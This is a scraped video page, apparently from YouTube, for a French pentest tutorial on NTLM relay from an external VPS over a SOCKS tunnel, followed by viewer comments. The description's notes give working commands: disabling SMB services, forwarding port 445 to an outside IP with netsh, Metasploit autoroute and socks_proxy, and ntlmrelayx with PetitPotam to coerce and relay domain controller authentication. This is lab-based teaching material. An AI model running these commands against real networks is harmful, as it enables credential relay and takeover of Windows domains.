Тёмный

Cette technique de PENTEST est radicale ! 

Processus Thief
Подписаться 52 тыс.
Просмотров 27 тыс.
50% 1

Vidéo en français expliquant comment mettre en place un relai d'authentification NTLM par le biais d'une machine située à l'extérieur du réseau local, en établissant un tunnel sur le protocole SOCKS.
Cette vidéo est à vocation instructive.
La technique présentée ici est effectuée au sein d'un environnement contrôlé dédié à cet effet.
Un test d'intrusion, ou pentest, doit toujours s'effectuer avec l'accord du client et dans un périmètre défini au préalable.
-----------------------------------------------------------------------------------
Quelques infos sur le pivoting et le protocole SOCKS :
- learn.microsoft.com/en-us/ope...
- learn.microsoft.com/fr-fr/win...
-----------------------------------------------------------------------------------
Mon cours GRATUIT complet sur l'authentification sous Windows :
- • AUTHENTIFICATION SOUS ...
- docs.lestutosdeprocessus.fr/A...
- learn.microsoft.com/fr-fr/win...
-----------------------------------------------------------------------------------
Quelques infos sur Petit Potam :
- learn.microsoft.com/en-us/ope...
- github.com/topotam/PetitPotam
-----------------------------------------------------------------------------------
MES NOTES COMPLETES :
Sous Windows :
On peut stopper les services LanManServer pour stopper le SMB (modifié)
il faut stopper et mettre en disabled les services :
```
netlogon
lanmanserver
lanmanworkstation
Si les 2 derniers services n'existe pas, passer leur statut "start" à "4" dans le registre :
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanworkstation
```
ensuite on reboot la machine
on se reconnecte dessus et on reprend un meterpreter en system sur la machine
on forward son port 445 vers notre kali
```
netsh interface portproxy add v4tov4 listenaddress=172.16.1.100 listenport=445 connectaddress=51.38.35.62 connectport=4450
```
On génère un meterpreter et on récupère la connexion dans notre VPS
On ajoute une route pour faire transiter les paquets vers le lan
```
run autoroute -s 172.16.1.0/24
```
On utilise le module proxy_socks dans metasploit pour router les paquets sur le lan au travers d'un tunnel proxy :
```
use auxiliary/server/socks_proxy
set srvport 8090
set version 4a
run
```
On modifie notre config proxychains pour passer par le tunnel et on monte un relai ntlm :
```
proxychains python3 ntlmrelayx.py -t 172.16.1.1 -ts --no-http-server --smb-port 4450 -debug
```
Ensuite on peut trigger une authentification via proxychains vers la machine de contrôle :
```
proxychains python3 PetitPotam.py 172.16.1.100 172.16.1.2
```
Et voilà !
-----------------------------------------------------------------------------------
Le lien de mon blog :
processus.site
Le lien pour rejoindre le serveur Discord :
/ discord

Опубликовано:

 

3 фев 2023

Поделиться:

Ссылка:

Скачать:

Готовим ссылку...

Добавить в:

Мой плейлист
Посмотреть позже
Комментарии : 59   
@elronn58
@elronn58 Год назад
Excellent vidéo. J'ai parcouru les commentaires, et je confirme, en France (et pas que je pense) les tpe/pme sont de vraies passoires. Tous les jours j'entends: " mais nous ne sommes pas la NASA, bah qui voudrait s'en prendre à ma petite boite, on a un antivirus et un firewall on est bon ?" .... Je dirais (au niveau des mes clients) que ça commence doucement à bouger, mais franchement il y a encore un gouffre gigantesque à combler. Rien que pour sensibiliser l'utilisateur de base.Bref je pense avec un peu de culot, un téléphone et un teamviewer y'a moyen de faire déjà des choses magnifiques. Pour peut qu'il y ait une application à la con, sur la machine sur laquelle t'as pris la main, qui nécessite que l'utilisateur soit admin du poste (et j'en vois des paquets), là ! c'est la fête du slip. Et pour finir, bien entendu quand t'es la petite SSII qui essaye de faire son boulot correctement, qui propose des solutions pour, un, que ça fonctionne correctement et ne pas être (trop) emmerdé, deux pour ne pas que ton infra se fasse démonter en 1h par le premier script kiddie du coin, ben soit y'a pas le budget en face soit tu passes pour un voleur 😁
@chtimanuxx
@chtimanuxx Год назад
Excellent !! Comme toujours 😍 Belle démo 😉 Merci !!
@allanchapuis
@allanchapuis Год назад
Merci à chaque fois tes vidéos arrivent au bon moment 😍😍, ça va m'aider pour l'oscp !!
@nicoghosthaker
@nicoghosthaker Год назад
Aah ça fait vraiment plaisir de te revoir 😀
@SibeR__
@SibeR__ Год назад
Très belle vidéo, c'est un bon pentest, tous ne vont pas aussi loin.
@sambot5875
@sambot5875 Год назад
Bravo pour la clarté et les zoom avants qui m'ont permis de suivre sur un smartphone sans sourciller ^^ et merci pour cet excellent sujet, on reconnaît le style astucieux s'inscrivant dès les premiers pas de la chaîne 👏🏼
@merlude
@merlude Год назад
Merci pour ton excellente vidéo proc !
@likmamalik908
@likmamalik908 Год назад
Super ce format de vidéo merci
@RomainRollot
@RomainRollot Год назад
Bravo et merci pour cette démo
@pierrenlend
@pierrenlend Год назад
Excellent, ça change de le faire hors réseau interne.
@Fais-pas-le-fou467
@Fais-pas-le-fou467 Год назад
Super vidéo, merci 👍
@zziterion
@zziterion Год назад
Hey, j'ai beaucoup aimé ce format de video c'est top !
@processusthief
@processusthief Год назад
Oh merci beaucoup ! ❤️
@saintthomastaquin1460
@saintthomastaquin1460 Год назад
Très interessant ! Merci bcp !
@gazza854
@gazza854 Год назад
Bien vu d'avoir ajouter les 'notes complètes' en description de la vidéo : très utile pour retrouver rapidement les infos importantes (Une suggestion sur la musique de fond : elle est discrète, mais la supprimer serait encore mieux je pense ;-) )
@jonathanfranco4008
@jonathanfranco4008 Год назад
cool merci pour la vidéo
@henriefrik349
@henriefrik349 Год назад
Bien vu👍😜😘
@xavierrambaud2973
@xavierrambaud2973 Год назад
Cette vidéo est réalisée en collaboration avec Doliprane
@louiseflaurettedjuogo5441
@louiseflaurettedjuogo5441 Год назад
Juste Wow
@TyboRed
@TyboRed Год назад
Bonjour, attention, à 8:26 on voit votre adresse IP : 82.X pendant une demi seconde. Sinon, super vidéo merci
@MaximusIA
@MaximusIA Год назад
@ZER0KVS
@ZER0KVS Год назад
Bonne vidéo, même si tu démarres avec une session admin sur le réseau ce qui facilite grandement la suite il faut être honnête. Et je me demande ce que fout le Fw avec l'ouverture de port exotique 😅. Mais c'est un bon exemple quand même
@processusthief
@processusthief Год назад
Yep, dans ce cas précis je n’ai mis aucune protection particulière et aucun firewall réseau, c’est vraiment un lab de démo 😉 Sur un environnement hardenné on pourrait encapsuler notre meterpreter sur une connexion https et paramétrer notre port d’écoute sur le TCP 443 par exemple, trouver un moyen de relayer l’authentification au travers du tunnel et pas directement sur l’adresse ip publique du VPS… Tout est possible mais là l’idée était surtout de montrer la technique 😉
@juliecox6494
@juliecox6494 Год назад
merci pour cette video ;) ça serait cool que tu nous dises comment bloqué ce type d attaque.Est ce qu un edr permettrai de détecter la redirection vers le relais NTLM?
@processusthief
@processusthief Год назад
Tout dépend des règles de détection et de blocage de ton EDR (YARA/SIGMA) 😉 Perso a mon boulot on a travailler justement sur ces événements mais ça nécessite d’activer certains journaux d’audit supplémentaires pour la détection et de mettre en place du filtrage rpc pour le blocage 😉 tiens j’en ferais peut-être une vidéo de suivi ! Ça peut être cool de voir la partie défensive !
@juliecox6494
@juliecox6494 Год назад
@@processusthief merci pour ta reponse, je serai très curieuse cette video. :)
@soolaxx
@soolaxx Год назад
hello bro fait nous voir une attaque de type spectre v2 et comment s'en protéger pls bonne journée
@MrMarkham89
@MrMarkham89 Год назад
Excellente vidéo, j'aurais aimé une petite partie blue team (quel réglage pour éviter ce genre d'attaque).
@processusthief
@processusthief Год назад
Yes ! Ton commentaire est le second qui demande cette partie, je pense que j’en ferais une vidéo dédiée 😉
@codix__
@codix__ Год назад
On a le hash mais du coup on n'a pas le mot de passe en clair ou alors le hash est suffisant pour pouvoir se connecter de toute façon ? Cette faille fonctionne que s'il y a deux instances Active Directory sur deux serveurs différents dans un même domaine aussi. Très intéressant comme toujours et vraiment bien expliqué alors que je suis une brèle sur les Windows server.
@processusthief
@processusthief Год назад
Suivant le type de hash on peut soit le bruteforcer, soit faire du pass the hash pour s’authentifier 😉 la c’est vraiment la technique que je voulais montrer, ensuite le use case ça peut être dans le cas de 2 dc, ou un exchange, un sharepoint, une autorité de certif, tout ce qui va faire de la délégation d’authentification pour permettre une privesc
@ThatFackChannel
@ThatFackChannel Год назад
Hello Procesus; super vidéo ! Mais NTLM a complétement été abandonné depuis Kerberos pour de l'authentification sur contrôleur de domaine, je me trompe ?
@processusthief
@processusthief Год назад
Nope pas du tout ! Par défaut quand on a un environnement AD on a du Kerberos+NTLM 😉 il faut manuellement désactiver NTLM par GPO pour forcer uniquement Kerberos, mais ça implique pas mal de changements au niveau du parc complet
@NoNames_tv
@NoNames_tv Год назад
Salut ! P'tite information, à 8:26 il est possible de voir ton IP elle est pas complètement caché :/
@processusthief
@processusthief Год назад
Salut 👋 Yep au début j’ai commencé à flouter et au final je l’avais mis tellement partout que j’ai abandonné 😅 Dans tous les cas elle peut être trouvée en résolvant l’ip de mon serveur de mail et je vais changer d’offre (donc d’ip) dans pas longtemps Mais merci pour ton alerte 🙏
@jonathanfranco4008
@jonathanfranco4008 Год назад
Tu utilises quel logiciel pour creer tes docs technique ?
@processusthief
@processusthief Год назад
Il s’agit d’Obsidian et je synchronise le coffre avec OneDrive 😉
@jipepsb5166
@jipepsb5166 11 месяцев назад
Salut intéressant ton tuto mais.si un par feu n'est pas désactivé sais compliqué.peace
@soolaxx
@soolaxx Год назад
parle nous de spectre v2 stp
@maifessa4327
@maifessa4327 Год назад
Peut-on faire la même chose avec un compte utilisateur sans permissions administrateur et l'antivirus Intercept-X Advanced with XDR actif ?
@processusthief
@processusthief Год назад
Sans droits admin tu ne pourras pas désactiver les services pour rediriger le port SMB 😉
@hackoolhackool4160
@hackoolhackool4160 Год назад
salut merci beaucoup ;p j'avais une question tu pourrai faire une vidéo sur le flipper zéro . J'ai vue que il et possible de hacker pas mal de choses avec ;p
@processusthief
@processusthief Год назад
Yes pourquoi pas !
@buddysdz
@buddysdz Год назад
Assez contre-intuitive comme astuce : t'as l'accès admin local, mais t'utilises un serveur distant pour ton pentest. 🙃
@Servietsky_
@Servietsky_ Год назад
jme demande toujours pourquoi les gens utilisent encore putty, excellente vidéo !
@processusthief
@processusthief Год назад
L’habitude 😅 merci 🙏
@LeCheneDeTele
@LeCheneDeTele Год назад
« pourquoi les gens utilisent encore putty » Selon toi ils devraient utiliser quoi ?
@SibeR__
@SibeR__ Год назад
Perso les copié/collé dans wt ne marche pas correctement, donc putty.
@processusthief
@processusthief Год назад
J'entends beaucoup de bien de MobbaXterm, sinon une clé publique dans les clés autorisées et un WSL2 pour se connecter ça fait très bien l'affaire :)
@Servietsky_
@Servietsky_ Год назад
@@processusthief je peux plua men passer de moba perso
@terror403
@terror403 Год назад
Next time, change lport 4444 ça sonne ds un SOC x)
@processusthief
@processusthief Год назад
Yes et le type de stager aussi haha 😅
@pierre8851
@pierre8851 Год назад
Fais gaffe je pense que c’est un oublie mais à 10:57 tu montrée ton IP
@ds2kx
@ds2kx Год назад
Merci pr l'effort de la vidéo mais j'avoue me demander à quoi cela peut servir étant donné que ds des entreprises digne de ce nom, tu as un firewall hardware ds lequel tu actives la réécriture de protocole et c'est mort, tu pourras essayer tout ce que tu veux, les trames d'entrées et sorties étant analysées et réécrites ne sont plus exploitables. Je pense, à mon humble avis, que cette démonstration a un intérêt très limité. Quoi qu'il en soit, encore mci pr la vidéo.
@processusthief
@processusthief Год назад
Yep, dans ce cas précis je n’ai mis aucune protection particulière et aucun firewall réseau, c’est vraiment un lab de démo 😉 Sur un environnement hardenné on pourrait encapsuler notre meterpreter sur une connexion https et paramétrer notre port d’écoute sur le TCP 443 par exemple, trouver un moyen de relayer l’authentification au travers du tunnel et pas directement sur l’adresse ip publique du VPS… Tout est possible mais là l’idée était surtout de montrer la technique 😉
@ds2kx
@ds2kx Год назад
@@processusthief a mais je ne remets pas en question ta démonstration, c'est pour ca que je t'ai remercié, je m'interroge juste sur l'utilité en cas réel étant donné qu'il me semblait avoir compris que c'était une demande d'un client, dans une situation réelle, avec un matériel adéquat genre firewall hard avec réécriture aggressive de protocole comme sur les regrettés watchguard, les requêtes sont analysées en profondeur et j'ai déjà essayé de le gruger en imbriquant des encapsulations (par exemple du ssh dans un vpn, reverse ssh etc ) et malgré tout, le FW détecte bien une utilisation anormale et drop les paquets. C'est juste "l'intérêt" qui me questionnait, mnt ds le cadre d'une vidéo youtube c'est divertissant ms en "real case", je ne comprenais simplement pas l'intérêt. Merci de ton retour en tous cas. Bonne journée à toi.
@processusthief
@processusthief Год назад
Le pentester avec qui j'en ai parlé faisait face à un contrôleur vulnérable à printer bug (j'ai pas plus de détails, je l'ai juste aidé à mettre en place son relai), et de mon côté j'ai déjà expérimenté face à un contrôleur en Server 2008 sur lequel on peut désactiver la signature de paquet (l'option remove-mic) En france on a pas mal d'infra vieillissante ou avec très peu d'hardening surtout chez les TPE/PME
Далее
LE SECRET DE L'ANONYMAT DES HACKERS
10:00
Просмотров 43 тыс.
COMMENT LES HACKERS VOUS PIRATENT : TECHNIQUE N°2
8:31
Comment fonctionne le DLL HIJACKING ?
11:02
Просмотров 41 тыс.
Cette école de hacker existe en France
17:57
Просмотров 107 тыс.
COMMENT LES HACKERS VOUS PIRATENT : TECHNIQUE N°4
10:15
Le plus petit ordinateur de hacking du monde
8:54
Просмотров 283 тыс.
KAISEN LINUX : La distrib des admin !
12:03
Просмотров 7 тыс.
COMMENT LES HACKERS VOUS PIRATENT : TECHNIQUE N°1
6:38
EXPLOITATION DE STACK BUFFER OVERFLOW
16:26
Просмотров 15 тыс.